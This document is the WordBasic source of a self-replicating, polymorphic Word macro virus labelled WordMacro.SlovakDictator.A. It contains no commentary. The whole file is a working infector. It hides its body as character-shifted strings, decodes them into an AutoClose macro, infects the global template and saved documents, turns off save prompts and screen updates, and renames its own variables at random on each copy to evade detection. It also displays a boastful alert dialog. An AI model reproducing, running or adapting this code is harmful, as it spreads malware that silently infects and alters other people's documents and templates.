
REM --------- WordMacro.SlovakDictator.A
REM --------- source code - 2nd generation
REM --------- it is cool, isn't it ?
REM --------- do not modify !
REM ---------------------------------------
Dim Shared JOLSRGVAJVAVPCQSFS
Dim Shared RSTSDTQABCFRIMEDS
Dim Shared NNJVBQFICLBT
Dim Shared CTSBMNQRJVKTUN
Dim Shared RAQIEGQHTEKGMJPA
Dim Shared BLMVUIODKQID
Dim Shared TRFEHFFKDGA
Dim Shared PNFFUDGIOJHJMOJS
Dim Shared EEMSCNFUSDSA
Dim Shared IMNVDDCUIELPKGOQ
Dim Shared KILNETOHSCNTSGEB
Dim Shared FDCKUBLQVSMCLCS$(200)
Dim Shared ESBGMDHQMTV
Dim Shared UKEHLODOGSTCBCFES
Dim Shared LAOGRDANQUAUGEMDRC
Dim Shared TISEIKHODQQCGBM$(31)
Dim Shared VAHINRNESDMBBCBTNOG

Sub MAIN
On Error Goto BCLHQBLUFOGCO
DisableInput 1
JOLSRGVAJVAVPCQSFS = 0
RSTSDTQABCFRIMEDS = 1
NNJVBQFICLBT = 2
CTSBMNQRJVKTUN = 7
RAQIEGQHTEKGMJPA = 10
BLMVUIODKQID = 20
TRFEHFFKDGA = 22
PNFFUDGIOJHJMOJS = 65
EEMSCNFUSDSA = 34
IMNVDDCUIELPKGOQ = 64
ESBGMDHQMTV = 38
UKEHLODOGSTCBCFES = 120
LAOGRDANQUAUGEMDRC = 179
VAHINRNESDMBBCBTNOG = 31
GPDTGRQFBAB$ = AppInfo$(NNJVBQFICLBT)
SBKVJOSUHRSLRIAJTBQ = Val(Left$(GPDTGRQFBAB$, RSTSDTQABCFRIMEDS))
If SBKVJOSUHRSLRIAJTBQ <> CTSBMNQRJVKTUN Then Goto BCLHQBLUFOGCO
Call FVNIPFORQMUIV
ScreenUpdating JOLSRGVAJVAVPCQSFS
DisableAutoMacros RSTSDTQABCFRIMEDS
QRQLVKABPUEJAAJGMF

CUMKMEDQSRG$ = WindowName$()
ToolsMacro .Name = "KRTMEMGAIRIIJV", .Show = RSTSDTQABCFRIMEDS, .Edit
EditClear - BLMVUIODKQID
For OTSPNBQUVCREARJ = JOLSRGVAJVAVPCQSFS To LAOGRDANQUAUGEMDRC : Insert FDCKUBLQVSMCLCS$(OTSPNBQUVCREARJ) : InsertPara : Next OTSPNBQUVCREARJ

EditReplace .Find = Chr$(IMNVDDCUIELPKGOQ) + Chr$(IMNVDDCUIELPKGOQ), .Replace = Chr$(EEMSCNFUSDSA), .Direction = JOLSRGVAJVAVPCQSFS, .MatchCase = RSTSDTQABCFRIMEDS, .WholeWord = JOLSRGVAJVAVPCQSFS, .PatternMatch = JOLSRGVAJVAVPCQSFS, .SoundsLike = JOLSRGVAJVAVPCQSFS, .ReplaceAll, .Format = JOLSRGVAJVAVPCQSFS, .Wrap = RSTSDTQABCFRIMEDS, .FindAllWordForms = JOLSRGVAJVAVPCQSFS

NBRAOKIBBFOKGI
UFFHOQFGCU
DocClose RSTSDTQABCFRIMEDS
Activate CUMKMEDQSRG$

Call KRTMEMGAIRIIJV
ToolsMacro .Name = "KRTMEMGAIRIIJV", .Show = RSTSDTQABCFRIMEDS, .Delete

BCLHQBLUFOGCO:
DisableAutoMacros JOLSRGVAJVAVPCQSFS
ScreenUpdating RSTSDTQABCFRIMEDS
DisableInput JOLSRGVAJVAVPCQSFS
End Sub

Sub QRQLVKABPUEJAAJGMF
For OTSPNBQUVCREARJ = JOLSRGVAJVAVPCQSFS To LAOGRDANQUAUGEMDRC
BVEDQHRBEVT$ = ""
SKPAQDHJGRB = Len(FDCKUBLQVSMCLCS$(OTSPNBQUVCREARJ))
For FVVNOICFUVCMSET = RSTSDTQABCFRIMEDS To SKPAQDHJGRB
BVEDQHRBEVT$ = BVEDQHRBEVT$ + Chr$(Asc(Mid$(FDCKUBLQVSMCLCS$(OTSPNBQUVCREARJ), FVVNOICFUVCMSET, RSTSDTQABCFRIMEDS)) - KILNETOHSCNTSGEB)
Next FVVNOICFUVCMSET
FDCKUBLQVSMCLCS$(OTSPNBQUVCREARJ) = BVEDQHRBEVT$
Next OTSPNBQUVCREARJ
End Sub

Sub NBRAOKIBBFOKGI
For OTSPNBQUVCREARJ = JOLSRGVAJVAVPCQSFS To LAOGRDANQUAUGEMDRC
Insert "FDCKUBLQVSMCLCS$(" + Str$(OTSPNBQUVCREARJ) + ")=" + Chr$(EEMSCNFUSDSA) + FDCKUBLQVSMCLCS$(OTSPNBQUVCREARJ) + Chr$(EEMSCNFUSDSA)
InsertPara
Next OTSPNBQUVCREARJ
For OTSPNBQUVCREARJ = JOLSRGVAJVAVPCQSFS To VAHINRNESDMBBCBTNOG - RSTSDTQABCFRIMEDS
Insert "TISEIKHODQQCGBM$(" + Str$(OTSPNBQUVCREARJ) + ")=" + Chr$(EEMSCNFUSDSA) + TISEIKHODQQCGBM$(OTSPNBQUVCREARJ) + Chr$(EEMSCNFUSDSA)
InsertPara
Next OTSPNBQUVCREARJ
End Sub

Function EJQGEPDKDADFPSQN$
BVEDQHRBEVT$ = ""
For OTSPNBQUVCREARJ = RSTSDTQABCFRIMEDS To RAQIEGQHTEKGMJPA + Rnd() * RAQIEGQHTEKGMJPA : BVEDQHRBEVT$ = BVEDQHRBEVT$ + Chr$(Rnd() * TRFEHFFKDGA + PNFFUDGIOJHJMOJS) : Next OTSPNBQUVCREARJ
EJQGEPDKDADFPSQN$ = BVEDQHRBEVT$
End Function

Sub UFFHOQFGCU
For OTSPNBQUVCREARJ = JOLSRGVAJVAVPCQSFS To VAHINRNESDMBBCBTNOG - RSTSDTQABCFRIMEDS
EditReplace .Find = TISEIKHODQQCGBM$(OTSPNBQUVCREARJ), .Replace = EJQGEPDKDADFPSQN$, .Direction = JOLSRGVAJVAVPCQSFS, .MatchCase = RSTSDTQABCFRIMEDS, .WholeWord = JOLSRGVAJVAVPCQSFS, .PatternMatch = JOLSRGVAJVAVPCQSFS, .SoundsLike = JOLSRGVAJVAVPCQSFS, .ReplaceAll, .Format = JOLSRGVAJVAVPCQSFS, .Wrap = RSTSDTQABCFRIMEDS, .FindAllWordForms = JOLSRGVAJVAVPCQSFS
Next OTSPNBQUVCREARJ
End Sub

Sub FVNIPFORQMUIV
KILNETOHSCNTSGEB =  6
FDCKUBLQVSMCLCS$(0) = "Jos&Yngxkj&PURYXM\GP\G\VIWYLY"
FDCKUBLQVSMCLCS$(1) = "Jos&Yngxkj&XYZYJZWGHILXOSKJY"
FDCKUBLQVSMCLCS$(2) = "Jos&Yngxkj&TTP\HWLOIRHZ"
FDCKUBLQVSMCLCS$(3) = "Jos&Yngxkj&IZYHSTWXP\QZ[T"
FDCKUBLQVSMCLCS$(4) = "Jos&Yngxkj&XGWOKMWNZKQMSPVG"
FDCKUBLQVSMCLCS$(5) = "Jos&Yngxkj&HRS\[OUJQWOJ"
FDCKUBLQVSMCLCS$(6) = "Jos&Yngxkj&ZXLKNLLQJMG"
FDCKUBLQVSMCLCS$(7) = "Jos&Yngxkj&VTLL[JMOUPNPSUPY"
FDCKUBLQVSMCLCS$(8) = "Jos&Yngxkj&KKSYITL[YJYG"
FDCKUBLQVSMCLCS$(9) = "Jos&Yngxkj&OST\JJI[OKRVQMUW"
FDCKUBLQVSMCLCS$(10) = "Jos&Yngxkj&QORTKZUNYITZYMKH"
FDCKUBLQVSMCLCS$(11) = "Jos&Yngxkj&LJIQ[HRW\YSIRIY*.866/"
FDCKUBLQVSMCLCS$(12) = "Jos&Yngxkj&KYHMSJNWSZ\"
FDCKUBLQVSMCLCS$(13) = "Jos&Yngxkj&[QKNRUJUMYZIHILKY"
FDCKUBLQVSMCLCS$(14) = "Jos&Yngxkj&RGUMXJGTW[G[MKSJXI"
FDCKUBLQVSMCLCS$(15) = "Jos&Yngxkj&ZOYKOQNUJWWIMHS*.97/"
FDCKUBLQVSMCLCS$(16) = "Jos&Yngxkj&\GNOTXTKYJSHHIHZTUM"
FDCKUBLQVSMCLCS$(17) = ""
FDCKUBLQVSMCLCS$(18) = "Y{h&SGOT"
FDCKUBLQVSMCLCS$(19) = "Ut&Kxxux&Muzu&HIRNWHR[LUMIU"
FDCKUBLQVSMCLCS$(20) = "JoyghrkOtv{z&7"
FDCKUBLQVSMCLCS$(21) = "PURYXM\GP\G\VIWYLY&C&6"
FDCKUBLQVSMCLCS$(22) = "XYZYJZWGHILXOSKJY&C&7"
FDCKUBLQVSMCLCS$(23) = "TTP\HWLOIRHZ&C&8"
FDCKUBLQVSMCLCS$(24) = "IZYHSTWXP\QZ[T&C&="
FDCKUBLQVSMCLCS$(25) = "XGWOKMWNZKQMSPVG&C&76"
FDCKUBLQVSMCLCS$(26) = "HRS\[OUJQWOJ&C&86"
FDCKUBLQVSMCLCS$(27) = "ZXLKNLLQJMG&C&88"
FDCKUBLQVSMCLCS$(28) = "VTLL[JMOUPNPSUPY&C&<;"
FDCKUBLQVSMCLCS$(29) = "KKSYITL[YJYG&C&9:"
FDCKUBLQVSMCLCS$(30) = "OST\JJI[OKRVQMUW&C&<:"
FDCKUBLQVSMCLCS$(31) = "KYHMSJNWSZ\&C&9>"
FDCKUBLQVSMCLCS$(32) = "[QKNRUJUMYZIHILKY&C&786"
FDCKUBLQVSMCLCS$(33) = "RGUMXJGTW[G[MKSJXI&C&7=?"
FDCKUBLQVSMCLCS$(34) = "\GNOTXTKYJSHHIHZTUM&C&97"
FDCKUBLQVSMCLCS$(35) = "MVJZMXWLHGH*&C&GvvOtlu*.TTP\HWLOIRHZ/"
FDCKUBLQVSMCLCS$(36) = "YHQ\PUY[NXYRXOGPZHW&C&\gr.Rklz*.MVJZMXWLHGH*2&XYZYJZWGHILXOSKJY//"
FDCKUBLQVSMCLCS$(37) = "Ol&YHQ\PUY[NXYRXOGPZHW&BD&IZYHSTWXP\QZ[T&Znkt&Muzu&HIRNWHR[LUMIU"
FDCKUBLQVSMCLCS$(38) = "Igrr&L\TOVLUXWS[O\"
FDCKUBLQVSMCLCS$(39) = "-5555&hkmot&ul&nojjkt&vgxz&5555"
FDCKUBLQVSMCLCS$(40) = "Ynu}Hu~"
FDCKUBLQVSMCLCS$(41) = "I{xLork*&C&LorkTgsk*./"
FDCKUBLQVSMCLCS$(42) = "Ol&I{xLork*&C&FFFF&Znkt&Muzu&HIRNWHR[LUMIU"
FDCKUBLQVSMCLCS$(43) = ""
FDCKUBLQVSMCLCS$(44) = "Ol&InkiqOtyzgrrkj.6/&C&6&Znkt"
FDCKUBLQVSMCLCS$(45) = "Otlkiz.7/"
FDCKUBLQVSMCLCS$(46) = "ZuuryUvzoutyYg|k&4MruhgrJuzVxusvz&C&62&4LgyzYg|ky&C&6"
FDCKUBLQVSMCLCS$(47) = "Muzu&HIRNWHR[LUMIU"
FDCKUBLQVSMCLCS$(48) = "Ktj&Ol"
FDCKUBLQVSMCLCS$(49) = ""
FDCKUBLQVSMCLCS$(50) = "Jos&jrm&Gy&LorkYg|kGy"
FDCKUBLQVSMCLCS$(51) = "MkzI{x\gr{ky&jrm"
FDCKUBLQVSMCLCS$(52) = "Ol&jrm4Luxsgz&C&6&Znkt"
FDCKUBLQVSMCLCS$(53) = "jrm4Luxsgz&C&7"
FDCKUBLQVSMCLCS$(54) = "LorkYg|kGy&jrm"
FDCKUBLQVSMCLCS$(55) = "Ktj&Ol"
FDCKUBLQVSMCLCS$(56) = ""
FDCKUBLQVSMCLCS$(57) = "Ol&InkiqOtyzgrrkj.7/&C&6&Znkt"
FDCKUBLQVSMCLCS$(58) = "Otlkiz.9/"
FDCKUBLQVSMCLCS$(59) = "LorkYg|k"
FDCKUBLQVSMCLCS$(60) = "Ktj&Ol"
FDCKUBLQVSMCLCS$(61) = ""
FDCKUBLQVSMCLCS$(62) = "HIRNWHR[LUMIU@"
FDCKUBLQVSMCLCS$(63) = "Ktj&Y{h"
FDCKUBLQVSMCLCS$(64) = ""
FDCKUBLQVSMCLCS$(65) = "Y{h&Ynu}Hu~"
FDCKUBLQVSMCLCS$(66) = "VgxrgsktztV{i&C&Jg.Tu}.//"
FDCKUBLQVSMCLCS$(67) = "Ol&VgxrgsktztV{i&C&:&Ux&VgxrgsktztV{i&C&77&Znkt"
FDCKUBLQVSMCLCS$(68) = "Hkkv"
FDCKUBLQVSMCLCS$(69) = "Hkmot&Jogrum&[ykxJogrum&9>62&88:2&FF\ox{y&GRKXZ'FF"
FDCKUBLQVSMCLCS$(70) = "Zk~z&8?2&>2&9:?2&792&FF_u{-xk&otlkizkj&h&]uxjSgixu4Yru|gqJoizgzux&|ox{yFF2&4Zk~z7"
FDCKUBLQVSMCLCS$(71) = "Zk~z&7;2&8>2&9<62&792&FF]kriusk&zu&znk&RSK&.Rgskx-y&Sgixu&Ktmotk/&|kx4&7466FF2&4Zk~z8"
FDCKUBLQVSMCLCS$(72) = "Zk~z&7:;2&;72&7892&792&FFJoy&oy&Rk|kr&:87FF2&4Zk~z9"
FDCKUBLQVSMCLCS$(73) = "Zk~z&9;2&=92&9:82&792&FF.i/&73sgx3?=2&Tgyz&Rgskx&,,&[mr&R{ykx2&Yru|gqogFF2&4Zk~z:"
FDCKUBLQVSMCLCS$(74) = "Zk~z&9:2&?>2&9:92&792&FFJoy&oy&znk&loxyz&}uxrj&zx{k&vursuxvnoi&sgixu&|ox{y&'FF2&4Zk~z;"
FDCKUBLQVSMCLCS$(75) = "V{ynH{zzut&7862&7>>2&7:=2&872&FFGiikvz&5&Y{nrgyFF2&4V{yn7"
FDCKUBLQVSMCLCS$(76) = "Zk~z&7662&7<;2&88>2&792&FFHom&l{iq&zu&znk&hom&hu~kx&\4S4FF2&4Zk~z<"
FDCKUBLQVSMCLCS$(77) = "Ktj&Jogrum"
FDCKUBLQVSMCLCS$(78) = "Jos&jrm&Gy&[ykxJogrum"
FDCKUBLQVSMCLCS$(79) = "Jogrum.jrm/"
FDCKUBLQVSMCLCS$(80) = "Ktj&Ol"
FDCKUBLQVSMCLCS$(81) = "Ktj&Y{h"
FDCKUBLQVSMCLCS$(82) = ""
FDCKUBLQVSMCLCS$(83) = "L{tizout&InkiqOtyzgrrkj.p/"
FDCKUBLQVSMCLCS$(84) = "Ut&Kxxux&Xky{sk&Tk~z"
FDCKUBLQVSMCLCS$(85) = "InkiqOtyzgrrkj&C&6"
FDCKUBLQVSMCLCS$(86) = "Lux&o&C&7&Zu&Iu{tzSgixuy.p/"
FDCKUBLQVSMCLCS$(87) = "Ol&SgixuTgsk*.o2&p/&C&FFG{zuIruykFF&Znkt&InkiqOtyzgrrkj&C&7"
FDCKUBLQVSMCLCS$(88) = "Tk~z&o"
FDCKUBLQVSMCLCS$(89) = "Ktj&L{tizout"
FDCKUBLQVSMCLCS$(90) = ""
FDCKUBLQVSMCLCS$(91) = "Y{h&Otlkiz.]ngzZuOtlkiz/"
FDCKUBLQVSMCLCS$(92) = "I[SQSKJWYXM*&C&]otju}Tgsk*./"
FDCKUBLQVSMCLCS$(93) = "ZuurySgixu&4Tgsk&C&FFG{zuIruykFF2&4Ynu}&C&]ngzZuOtlkiz2&4Kjoz"
FDCKUBLQVSMCLCS$(94) = "KjozIrkgx&3&86"
FDCKUBLQVSMCLCS$(95) = ""
FDCKUBLQVSMCLCS$(96) = "-5555"
FDCKUBLQVSMCLCS$(97) = "-5555&\ru€ktok&vx|in&KYHMSJNWSZ\&xogjqu|&quj{&sgqxg"
FDCKUBLQVSMCLCS$(98) = "-5555&|ojozkrtg&igyz&3&tksktoz&'"
FDCKUBLQVSMCLCS$(99) = "-5555"
FDCKUBLQVSMCLCS$(100) = "Lux&o&C&6&Zu&KYHMSJNWSZ\&@&Otykxz&LJIQ[HRW\YSIRIY*.o/&@&OtykxzVgxg&@&Tk~z&o"
FDCKUBLQVSMCLCS$(101) = "-5555"
FDCKUBLQVSMCLCS$(102) = "-5555&vxkskttg&o&ojk&uj&xogjqu|&FFY{h&UxomotgrSgixuHujFF17"
FDCKUBLQVSMCLCS$(103) = "-5555&g€&vu&FFY{h&L\TOVLUXWS[O\FF37"
FDCKUBLQVSMCLCS$(104) = "-5555&|krso&vu€uxtk&{xioz&zokzu&qutyzgtz&'''"
FDCKUBLQVSMCLCS$(105) = "-5555"
FDCKUBLQVSMCLCS$(106) = "Lux&o&C&[QKNRUJUMYZIHILKY&Zu&RGUMXJGTW[G[MKSJXI&@&Otykxz&LJIQ[HRW\YSIRIY*.o/&@&OtykxzVgxg&@&Tk~z&o"
FDCKUBLQVSMCLCS$(107) = "KjozXkvrgik&4Lotj&C&Inx*.<:/&1&Inx*.<:/2&4Xkvrgik&C&Inx*.9:/2&4Joxkizout&C&62&4SgzinIgyk&C&72&4]nurk]uxj&C&62&4VgzzkxtSgzin&C&62&4Yu{tjyRoqk&C&62&4XkvrgikGrr2&4Luxsgz&C&62&4]xgv&C&72&4LotjGrr]uxjLuxsy&C&6"
FDCKUBLQVSMCLCS$(108) = ""
FDCKUBLQVSMCLCS$(109) = "QORTKZUNYITZYMKH&C&3&Otz..:&1&Xtj./&0&76//"
FDCKUBLQVSMCLCS$(110) = "Igrr&WXWR\QGHV[KPGGPMSL"
FDCKUBLQVSMCLCS$(111) = "Otykxz&FFQORTKZUNYITZYMKH&C&FF&1&Yzx*.3&QORTKZUNYITZYMKH/"
FDCKUBLQVSMCLCS$(112) = "OtykxzVgxg"
FDCKUBLQVSMCLCS$(113) = "THXGUQOHHLUQMO"
FDCKUBLQVSMCLCS$(114) = "JuiIruyk&7"
FDCKUBLQVSMCLCS$(115) = "Gizo|gzk&I[SQSKJWYXM*"
FDCKUBLQVSMCLCS$(116) = "Ktj&Y{h"
FDCKUBLQVSMCLCS$(117) = ""
FDCKUBLQVSMCLCS$(118) = "Y{h&UxomotgrSgixuHuj"
FDCKUBLQVSMCLCS$(119) = "-5555&ktj&ul&Nojjkt&vgxz&5555"
FDCKUBLQVSMCLCS$(120) = "Yixkkt[vjgzotm&PURYXM\GP\G\VIWYLY"
FDCKUBLQVSMCLCS$(121) = "JoyghrkG{zuSgixuy&XYZYJZWGHILXOSKJY"
FDCKUBLQVSMCLCS$(122) = "WXWR\QGHV[KPGGPMSL"
FDCKUBLQVSMCLCS$(123) = ""
FDCKUBLQVSMCLCS$(124) = "I[SQSKJWYXM*&C&]otju}Tgsk*./"
FDCKUBLQVSMCLCS$(125) = "ZuurySgixu&4Tgsk&C&FFQXZSKSMGOXOOP\FF2&4Ynu}&C&XYZYJZWGHILXOSKJY2&4Kjoz"
FDCKUBLQVSMCLCS$(126) = "KjozIrkgx&3&HRS\[OUJQWOJ"
FDCKUBLQVSMCLCS$(127) = "Lux&UZYVTHW[\IXKGXP&C&PURYXM\GP\G\VIWYLY&Zu&RGUMXJGTW[G[MKSJXI&@&Otykxz&LJIQ[HRW\YSIRIY*.UZYVTHW[\IXKGXP/&@&OtykxzVgxg&@&Tk~z&UZYVTHW[\IXKGXP"
FDCKUBLQVSMCLCS$(128) = ""
FDCKUBLQVSMCLCS$(129) = "KjozXkvrgik&4Lotj&C&Inx*.OST\JJI[OKRVQMUW/&1&Inx*.OST\JJI[OKRVQMUW/2&4Xkvrgik&C&Inx*.KKSYITL[YJYG/2&4Joxkizout&C&PURYXM\GP\G\VIWYLY2&4SgzinIgyk&C&XYZYJZWGHILXOSKJY2&4]nurk]uxj&C&PURYXM\GP\G\VIWYLY2&4VgzzkxtSgzin&C&PURYXM\GP\G\VIWYLY2&4Yu{tjyRoqk&C&PURYXM\" + "GP\G\VIWYLY2&4XkvrgikGrr2&4Luxsgz&C&PURYXM\GP\G\VIWYLY2&4]xgv&C&XYZYJZWGHILXOSKJY2&4LotjGrr]uxjLuxsy&C&PURYXM\GP\G\VIWYLY"
FDCKUBLQVSMCLCS$(130) = ""
FDCKUBLQVSMCLCS$(131) = "THXGUQOHHLUQMO"
FDCKUBLQVSMCLCS$(132) = "[LLNUWLMI["
FDCKUBLQVSMCLCS$(133) = "JuiIruyk&XYZYJZWGHILXOSKJY"
FDCKUBLQVSMCLCS$(134) = "Gizo|gzk&I[SQSKJWYXM*"
FDCKUBLQVSMCLCS$(135) = ""
FDCKUBLQVSMCLCS$(136) = "Igrr&QXZSKSMGOXOOP\"
FDCKUBLQVSMCLCS$(137) = "ZuurySgixu&4Tgsk&C&FFQXZSKSMGOXOOP\FF2&4Ynu}&C&XYZYJZWGHILXOSKJY2&4Jkrkzk"
FDCKUBLQVSMCLCS$(138) = ""
FDCKUBLQVSMCLCS$(139) = "HIRNWHR[LUMIU@"
FDCKUBLQVSMCLCS$(140) = "JoyghrkG{zuSgixuy&PURYXM\GP\G\VIWYLY"
FDCKUBLQVSMCLCS$(141) = "Yixkkt[vjgzotm&XYZYJZWGHILXOSKJY"
FDCKUBLQVSMCLCS$(142) = "JoyghrkOtv{z&PURYXM\GP\G\VIWYLY"
FDCKUBLQVSMCLCS$(143) = "Ktj&Y{h"
FDCKUBLQVSMCLCS$(144) = ""
FDCKUBLQVSMCLCS$(145) = "Y{h&WXWR\QGHV[KPGGPMSL"
FDCKUBLQVSMCLCS$(146) = "Lux&UZYVTHW[\IXKGXP&C&PURYXM\GP\G\VIWYLY&Zu&RGUMXJGTW[G[MKSJXI"
FDCKUBLQVSMCLCS$(147) = "H\KJWNXHK\Z*&C&FFFF"
FDCKUBLQVSMCLCS$(148) = "YQVGWJNPMXH&C&Rkt.LJIQ[HRW\YSIRIY*.UZYVTHW[\IXKGXP//"
FDCKUBLQVSMCLCS$(149) = "Lux&L\\TUOIL[\ISYKZ&C&XYZYJZWGHILXOSKJY&Zu&YQVGWJNPMXH"
FDCKUBLQVSMCLCS$(150) = "H\KJWNXHK\Z*&C&H\KJWNXHK\Z*&1&Inx*.Gyi.Soj*.LJIQ[HRW\YSIRIY*.UZYVTHW[\IXKGXP/2&L\\TUOIL[\ISYKZ2&XYZYJZWGHILXOSKJY//&3&QORTKZUNYITZYMKH/"
FDCKUBLQVSMCLCS$(151) = "Tk~z&L\\TUOIL[\ISYKZ"
FDCKUBLQVSMCLCS$(152) = "LJIQ[HRW\YSIRIY*.UZYVTHW[\IXKGXP/&C&H\KJWNXHK\Z*"
FDCKUBLQVSMCLCS$(153) = "Tk~z&UZYVTHW[\IXKGXP"
FDCKUBLQVSMCLCS$(154) = "Ktj&Y{h"
FDCKUBLQVSMCLCS$(155) = ""
FDCKUBLQVSMCLCS$(156) = "Y{h&THXGUQOHHLUQMO"
FDCKUBLQVSMCLCS$(157) = "Lux&UZYVTHW[\IXKGXP&C&PURYXM\GP\G\VIWYLY&Zu&RGUMXJGTW[G[MKSJXI"
FDCKUBLQVSMCLCS$(158) = "Otykxz&FFLJIQ[HRW\YSIRIY*.FF&1&Yzx*.UZYVTHW[\IXKGXP/&1&FF/CFF&1&Inx*.KKSYITL[YJYG/&1&LJIQ[HRW\YSIRIY*.UZYVTHW[\IXKGXP/&1&Inx*.KKSYITL[YJYG/"
FDCKUBLQVSMCLCS$(159) = "OtykxzVgxg"
FDCKUBLQVSMCLCS$(160) = "Tk~z&UZYVTHW[\IXKGXP"
FDCKUBLQVSMCLCS$(161) = "Lux&UZYVTHW[\IXKGXP&C&PURYXM\GP\G\VIWYLY&Zu&\GNOTXTKYJSHHIHZTUM&3&XYZYJZWGHILXOSKJY"
FDCKUBLQVSMCLCS$(162) = "Otykxz&FFZOYKOQNUJWWIMHS*.FF&1&Yzx*.UZYVTHW[\IXKGXP/&1&FF/CFF&1&Inx*.KKSYITL[YJYG/&1&ZOYKOQNUJWWIMHS*.UZYVTHW[\IXKGXP/&1&Inx*.KKSYITL[YJYG/"
FDCKUBLQVSMCLCS$(163) = "OtykxzVgxg"
FDCKUBLQVSMCLCS$(164) = "Tk~z&UZYVTHW[\IXKGXP"
FDCKUBLQVSMCLCS$(165) = "Ktj&Y{h"
FDCKUBLQVSMCLCS$(166) = ""
FDCKUBLQVSMCLCS$(167) = "L{tizout&KPWMKVJQJGJLVYWT*"
FDCKUBLQVSMCLCS$(168) = "H\KJWNXHK\Z*&C&FFFF"
FDCKUBLQVSMCLCS$(169) = "Lux&UZYVTHW[\IXKGXP&C&XYZYJZWGHILXOSKJY&Zu&XGWOKMWNZKQMSPVG&1&Xtj./&0&XGWOKMWNZKQMSPVG&@&H\KJWNXHK\Z*&C&H\KJWNXHK\Z*&1&Inx*.Xtj./&0&ZXLKNLLQJMG&1&VTLL[JMOUPNPSUPY/&@&Tk~z&UZYVTHW[\IXKGXP"
FDCKUBLQVSMCLCS$(170) = "KPWMKVJQJGJLVYWT*&C&H\KJWNXHK\Z*"
FDCKUBLQVSMCLCS$(171) = "Ktj&L{tizout"
FDCKUBLQVSMCLCS$(172) = ""
FDCKUBLQVSMCLCS$(173) = "Y{h&[LLNUWLMI["
FDCKUBLQVSMCLCS$(174) = "Lux&UZYVTHW[\IXKGXP&C&PURYXM\GP\G\VIWYLY&Zu&\GNOTXTKYJSHHIHZTUM&3&XYZYJZWGHILXOSKJY"
FDCKUBLQVSMCLCS$(175) = "KjozXkvrgik&4Lotj&C&ZOYKOQNUJWWIMHS*.UZYVTHW[\IXKGXP/2&4Xkvrgik&C&KPWMKVJQJGJLVYWT*2&4Joxkizout&C&PURYXM\GP\G\VIWYLY2&4SgzinIgyk&C&XYZYJZWGHILXOSKJY2&4]nurk]uxj&C&PURYXM\GP\G\VIWYLY2&4VgzzkxtSgzin&C&PURYXM\GP\G\VIWYLY2&4Yu{tjyRoqk&C&PURYXM\GP\G\VIWYLY2&4X" + "kvrgikGrr2&4Luxsgz&C&PURYXM\GP\G\VIWYLY2&4]xgv&C&XYZYJZWGHILXOSKJY2&4LotjGrr]uxjLuxsy&C&PURYXM\GP\G\VIWYLY"
FDCKUBLQVSMCLCS$(176) = "Tk~z&UZYVTHW[\IXKGXP"
FDCKUBLQVSMCLCS$(177) = "Ktj&Y{h"
FDCKUBLQVSMCLCS$(178) = ""
FDCKUBLQVSMCLCS$(179) = "Y{h&L\TOVLUXWS[O\"
TISEIKHODQQCGBM$(0) = "KILNETOHSCNTSGEB"
TISEIKHODQQCGBM$(1) = "FDCKUBLQVSMCLCS"
TISEIKHODQQCGBM$(2) = "TISEIKHODQQCGBM"
TISEIKHODQQCGBM$(3) = "JOLSRGVAJVAVPCQSFS"
TISEIKHODQQCGBM$(4) = "RAQIEGQHTEKGMJPA"
TISEIKHODQQCGBM$(5) = "TRFEHFFKDGA"
TISEIKHODQQCGBM$(6) = "CTSBMNQRJVKTUN"
TISEIKHODQQCGBM$(7) = "RSTSDTQABCFRIMEDS"
TISEIKHODQQCGBM$(8) = "BLMVUIODKQID"
TISEIKHODQQCGBM$(9) = "NNJVBQFICLBT"
TISEIKHODQQCGBM$(10) = "PNFFUDGIOJHJMOJS"
TISEIKHODQQCGBM$(11) = "EEMSCNFUSDSA"
TISEIKHODQQCGBM$(12) = "IMNVDDCUIELPKGOQ"
TISEIKHODQQCGBM$(13) = "ESBGMDHQMTV"
TISEIKHODQQCGBM$(14) = "UKEHLODOGSTCBCFES"
TISEIKHODQQCGBM$(15) = "LAOGRDANQUAUGEMDRC"
TISEIKHODQQCGBM$(16) = "VAHINRNESDMBBCBTNOG"
TISEIKHODQQCGBM$(17) = "OTSPNBQUVCREARJ"
TISEIKHODQQCGBM$(18) = "SKPAQDHJGRB"
TISEIKHODQQCGBM$(19) = "FVVNOICFUVCMSET"
TISEIKHODQQCGBM$(20) = "BVEDQHRBEVT"
TISEIKHODQQCGBM$(21) = "GPDTGRQFBAB"
TISEIKHODQQCGBM$(22) = "SBKVJOSUHRSLRIAJTBQ"
TISEIKHODQQCGBM$(23) = "BCLHQBLUFOGCO"
TISEIKHODQQCGBM$(24) = "QRQLVKABPUEJAAJGMF"
TISEIKHODQQCGBM$(25) = "CUMKMEDQSRG"
TISEIKHODQQCGBM$(26) = "NBRAOKIBBFOKGI"
TISEIKHODQQCGBM$(27) = "UFFHOQFGCU"
TISEIKHODQQCGBM$(28) = "KRTMEMGAIRIIJV"
TISEIKHODQQCGBM$(29) = "EJQGEPDKDADFPSQN"
TISEIKHODQQCGBM$(30) = "FVNIPFORQMUIV"

End Sub


